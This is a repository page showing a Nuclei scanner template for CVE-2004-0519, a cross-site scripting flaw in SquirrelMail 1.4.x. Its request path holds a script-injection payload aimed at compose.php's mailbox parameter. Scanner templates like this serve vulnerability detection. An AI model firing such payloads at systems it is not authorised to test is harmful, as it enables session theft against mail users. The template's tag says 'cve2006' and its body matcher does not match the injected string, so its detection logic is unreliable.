daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2004/CVE-2004-0519.yaml

30 lines
913 B
YAML
Raw Normal View History

Create CVE-2004-0519.yaml
2021-11-15 18:14:18 +00:00
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2006
Auto Generated CVE annotations [Mon Nov 15 18:16:11 UTC 2021] :robot:
2021-11-15 18:16:11 +00:00
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
Create CVE-2004-0519.yaml
2021-11-15 18:14:18 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox="><script>window.alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "alert('document.domain')"
part: body
- type: word
words:
- "text/html"
part: header